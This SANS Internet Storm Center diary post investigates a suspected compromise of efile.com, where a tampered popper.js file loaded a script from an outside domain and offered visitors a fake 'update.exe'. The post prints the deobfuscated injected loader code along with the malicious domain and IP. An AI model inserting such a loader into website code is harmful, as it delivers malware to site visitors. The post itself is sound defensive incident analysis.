Supply Chain Compromise or False Positive: The Intriguing Case of efile.com, (Mon, Apr 3rd)


Last week, related to the 3CX compromise, I mentioned how difficult it can be to determine if an overall trusted resource is compromised. This weekend, our reader Drew sent us a note that there is some talk about efile.com being possibly compromised. Users are reporting a popup that offers a file “update.exe.” This in itself is, of course, highly suspicious. But I was not able to reproduce the issue. Drew also linked to an any.run analysis showing the behavior [1].

The update.exe was apparently uploaded to VirusTotal [2]. When I checked earlier today, only two engines flagged the file: CrowdStrike and Cynet. I just redid the analysis and did not get any additional positives. The file appears to have been uploaded on March 17th, and its creation time is March 17th as well. A post on Reddit also observed the behavior on March 17th [3].

Let’s take a closer look at efile.com. The site uses common modern technologies: Bootstrap, jQuery, and Google Analytics [4]. Nothing too special about this. But things get a bit more interesting looking at the sources downloaded by the browser:

An empty response is received from https[:]//www[.]infoamanewonliag[.]online/update/index.php. The “update” part of the URL matches the name of the suspect binary that users reported (update.exe).

So why did the browser connect to infoamanewonliag[.]online?

It turns out that the request came from “popper.js”:

[Screenshot: snippet from popper.js showing the obfuscated code]

The slightly obfuscated code becomes (line breaks added for readability):

s=document.createElement('script');
document.body.appendChild(s);
s.src='//www.infoamanewonliag.online/update/index.php?'+Math.random();

The use of obfuscated code is indeed very odd. The remaining content of popper.js matches a standard bootstrap addon to display popup dialogs [5]. Someone took the normal and harmless popper.js and added obfuscated JavaScript to connect to infoamanewonliag[.]online.

What do we know about infoamanewonliag[.]online?

Whois shows that it was registered on March 12th and last updated on March 17th, the same day update.exe was created and uploaded to VirusTotal. The hostname resolves to 47.245.6.91, an IP address hosted by Alibaba.

Compromised or not? I reached out to efile.com and am waiting for a response. Only they should be able to know for sure if this code is supposed to be on the site or not. Any other ideas to figure out what exactly is happening here?

[1] https://app.any.run/tasks/d25c5a78-d22f-4a8c-b714-73541a66a412/
[2] https://www.virustotal.com/gui/file/882d95bdbca75ab9d13486e477ab76b3978e14d6fca30c11ec368f7e5fa1d0cb/detection
[3] https://www.reddit.com/r/Scams/comments/11tx8pj/possible_fake_website_network_error/
[4] https://urlscan.io/result/ae5e4300-a850-44c9-897b-c6abed59bd08/
[5] https://unpkg.com/[email protected]/dist/umd/popper.min.js


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
